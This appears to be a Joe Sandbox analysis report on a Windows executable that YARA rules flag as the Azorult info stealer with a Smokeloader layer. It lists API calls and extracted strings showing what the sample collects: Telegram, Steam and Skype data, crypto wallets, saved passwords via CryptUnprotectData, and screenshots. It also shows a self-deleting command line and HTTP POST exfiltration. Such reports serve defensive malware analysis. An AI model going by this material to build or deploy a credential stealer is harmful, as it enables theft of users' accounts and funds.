Jan 1, 2025 10:22:06.950241089 CET	735	IN	HTTP/1.1 403 Forbidden Server: nginx/1.4.5 Date: Wed, 01 Jan 2025 09:22:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 571 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 [TRUNCATED] Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	04:21:56
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\8p5iD52knN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8p5iD52knN.exe"
Imagebase:	0x400000
File size:	313'344 bytes
MD5 hash:	C30E2BAF61F34324CCBD0B0168DEF45E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: kevoreilly Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:22:06
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016
Imagebase:	0x980000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	6%
Total number of Nodes:	597
Total number of Limit Nodes:	13

Executed Functions

Function 004381A5 Relevance: 79.1, APIs: 41, Strings: 4, Instructions: 381
windowmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004381D5
GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 0043820B
CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00438221
CreateMemoryResourceNotification.KERNEL32(00000000), ref: 00438229
DlgDirSelectComboBoxExW.USER32(00000000,?,00000000,00000000), ref: 0043823C
InsertMenuItemW.USER32(00000000,00000000,00000000,00000000), ref: 0043824A
AppendMenuW.USER32(00000000,00000000,00000000,00000000), ref: 00438258
UnloadKeyboardLayout.USER32(00000000), ref: 00438260
SetRectRgn.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00438270
ExtractAssociatedIconA.SHELL32(00000000,?,?), ref: 00438286
ExtractIconEx.SHELL32(00000000,00000000,?,?,00000000), ref: 0043829D
FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004382A9
GetRegisteredRawInputDevices.USER32(00000000,00000000,00000000), ref: 004382B5
GetRegisteredRawInputDevices.USER32(00000000,00000000,00000000), ref: 004382C1
GetNextDlgGroupItem.USER32(00000000,00000000,00000000), ref: 004382CD
CallMsgFilter.USER32(00000000,00000000), ref: 004382D7
OpenClipboard.USER32(00000000), ref: 004382DF
GetClipboardSequenceNumber.USER32 ref: 004382E5
GetLastError.KERNEL32 ref: 004382EB
DragQueryFileW.SHELL32(00000000,00000000,00000000,00000000), ref: 004382F9
ShellAboutA.SHELL32(00000000,00000000,00000000,00000000), ref: 00438307
LoadMenuIndirectA.USER32(00000000), ref: 0043830F
LoadIconW.USER32(00000000,00000000), ref: 00438319
MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00438325
GetTickCount.KERNEL32 ref: 00438501
GetSystemTimes.KERNEL32(?,?,?), ref: 00438540
GetCPInfo.KERNEL32(00000000,?), ref: 0043854E
GlobalMemoryStatus.KERNEL32(?), ref: 0043855B
GetProcAddress.KERNEL32(00441C08), ref: 00438607
LoadLibraryA.KERNEL32(00441AD0), ref: 0043863A
GlobalAlloc.KERNEL32(00000000,00014C32), ref: 00438656
GlobalAlloc.KERNEL32(00000000,00014C32), ref: 00438664
VirtualProtect.KERNEL32(?,00014C32,00000020,00447E8C), ref: 004386E5
GetStartupInfoW.KERNEL32(00000000), ref: 004386FB
SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00438705
GetLastError.KERNEL32 ref: 0043870B
GetTickCount.KERNEL32 ref: 00438711

Strings

dusurubipopimitikiruyafelezeruxa gewewasehejumubilabomidetelo lelusu, xrefs: 004384F3
@, xrefs: 0043861F
@<, xrefs: 0043857B
>!B, xrefs: 00438679

Memory Dump Source

Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd

Similarity

API ID: GlobalIconLoadMenu$AllocClipboardCountCreateDevicesErrorExtractInfoInputItemLastMemoryNotificationRegisteredTickVirtual$AboutAddressAliasesAppendAssociatedCallChangeComboConsoleDragFileFilterFindFirstGroupIndirectInsertKeyboardLayoutLibraryMessageNamedNextNumberOpenParametersPeekPipeProcProcessProtectQueryRectResourceSelectSequenceShellShutdownStartupStatusSystemTimesUnload
String ID: @<$>!B$@$dusurubipopimitikiruyafelezeruxa gewewasehejumubilabomidetelo lelusu
API String ID: 2871737881-933728795
Opcode ID: ea71e4bb7916ca47ecbc02519c63b2ee1e25f1868df8a286cc2f0fd2c4e2ab98
Instruction ID: f12e34e91f97c90a2e5a1dd792cffaf7dc6ae6327b3ffaf23229371eec0cbeca
Opcode Fuzzy Hash: ea71e4bb7916ca47ecbc02519c63b2ee1e25f1868df8a286cc2f0fd2c4e2ab98
Instruction Fuzzy Hash: 8BF17171D44348EFEB20DBA4DD4ABDDBBB4AB04705F1040AAF209BA1D1DBB45A45CF19

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23

Strings

GdiplusStartup, xrefs: 00417B43
Gdiplus.dll, xrefs: 00417B48, 00417B62, 00417B7C, 00417B96, 00417BB0, 00417BCA, 00417BE4
GdipGetImageEncodersSize, xrefs: 00417B91
GdipGetImageEncoders, xrefs: 00417BAB
GetHGlobalFromStream, xrefs: 00417C13
GdipCreateBitmapFromHBITMAP, xrefs: 00417B77
GdipDisposeImage, xrefs: 00417BC5
crtdll.dll, xrefs: 00417B2E
GdipSaveImageToStream, xrefs: 00417BDF
GdiplusShutdown, xrefs: 00417B5D
CreateStreamOnHGlobal, xrefs: 00417BF9
wcscmp, xrefs: 00417B29
ole32.dll, xrefs: 00417BFE, 00417C18

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

Function 00438763 Relevance: 4.5, APIs: 3, Instructions: 48
processlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00441AD0), ref: 00438775
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00438812
Module32FirstW.KERNEL32(00000000,?), ref: 00438820

Part of subcall function 004381A5: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004381D5
Part of subcall function 004381A5: GetTickCount.KERNEL32 ref: 00438501
Part of subcall function 004381A5: GetSystemTimes.KERNEL32(?,?,?), ref: 00438540
Part of subcall function 004381A5: GetCPInfo.KERNEL32(00000000,?), ref: 0043854E
Part of subcall function 004381A5: GlobalMemoryStatus.KERNEL32(?), ref: 0043855B

Memory Dump Source

Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd

Similarity

API ID: CountCreateFirstGlobalInfoLibraryLoadMemoryMessageModule32PeekSnapshotStatusSystemTickTimesToolhelp32
String ID:
API String ID: 742628225-0
Opcode ID: 650fdbf8769d7dbd00ceb9c96eeafe9786b102405424d85ce780cdde091103ab
Instruction ID: ef4b522a7121729634f5e3c248a88c262e1800d241b3cbe006ab8058dcbe68de
Opcode Fuzzy Hash: 650fdbf8769d7dbd00ceb9c96eeafe9786b102405424d85ce780cdde091103ab
Instruction Fuzzy Hash: 51114228949381E9E306A779AC09B063E987317348F0601FED4A4562B2D7FE1519D76F

Function 004065CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195

Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435

GetSystemMetrics.USER32(00000001), ref: 00419460
GetSystemMetrics.USER32(00000000), ref: 00419468
ExitProcess.KERNEL32(00000000), ref: 00419F2B

Strings

"countryCode":", xrefs: 004198BA
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419E66
Skype, xrefs: 004193F8
<c>, xrefs: 00419281
%appdata%\Telegram Desktop\tdata\, xrefs: 00419425
</c>, xrefs: 00419279
"query":", xrefs: 004198A4
Files\, xrefs: 004196C6, 004197A1
<n>, xrefs: 004192A8
D877F783D5*,map*, xrefs: 00419420
exit, xrefs: 00419262
</d>, xrefs: 004192D7
image/jpeg, xrefs: 00419455
http://ip-api.com/json, xrefs: 0041988E
%DSK_, xrefs: 004194C5, 004194E2, 0041956B
System.txt, xrefs: 00419938
PasswordsList.txt, xrefs: 00419368
Steam, xrefs: 0041943B
</n>, xrefs: 004192A0
Telegram, xrefs: 0041941B
<, xrefs: 00419E1B
%comspec%, xrefs: 00419E45
ip.txt, xrefs: 004198E5, 004198F7
0_@, xrefs: 00419CD7, 0041A0EA
<d>, xrefs: 004192DF
GET, xrefs: 00419887
Coins, xrefs: 004193CE
scr.jpg, xrefs: 00419475

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
API String ID: 447519224-805684967
Opcode ID: bc2d9aa0ce9f509a8af9cfcef76fe04711796da2ad7deb0f793843fff6f3637b
Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
Opcode Fuzzy Hash: bc2d9aa0ce9f509a8af9cfcef76fe04711796da2ad7deb0f793843fff6f3637b
Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

Function 00418688 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4

Strings

Host: , xrefs: 00418951
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041897F
POST, xrefs: 004186DD
wininet.dll, xrefs: 00418701
.bit, xrefs: 00418928

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 3386017226-2879170074
Opcode ID: 6429366c6769f625a15f2e8b34452719443efabef2c4d045cb4197efb996f934
Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
Opcode Fuzzy Hash: 6429366c6769f625a15f2e8b34452719443efabef2c4d045cb4197efb996f934
Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58

Function 0061FDB4 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0061FFC5

Strings

cess, xrefs: 0061FF05
kernel32.dll, xrefs: 0061FE07, 0061FE0D

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
Instruction ID: 20c942b14a7887e1165a2399999d9af83e66756eebf741003cc18f0dd6365a57
Opcode Fuzzy Hash: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
Instruction Fuzzy Hash: 0A127A75A01228DFDBA4CF98D885B9CBBB1BF09304F1480D9E54DAB352DB30AA85DF15

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579

Strings

CryptUnprotectData, xrefs: 00409569
crypt32.dll, xrefs: 0040956E

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AccountCheckFreeLookupMembershipToken
String ID:
API String ID: 1602037265-0
Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

Function 006203E4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(msvcr100.dll), ref: 00620612

Strings

msvcr100.dll, xrefs: 0062060B, 00620611

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: msvcr100.dll
API String ID: 1029625771-4078232268
Opcode ID: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
Instruction ID: 9987bc236bc94fb179c834a473e6f8c0a052564b966cd18ec913c36cd583f586
Opcode Fuzzy Hash: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
Instruction Fuzzy Hash: 42917174A0026ACFDB64CF58C984BA8B7B1AF09304F1581E9E50DA7752DB34AEC5DF14

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00404101

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 2525500382-1514646153
Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
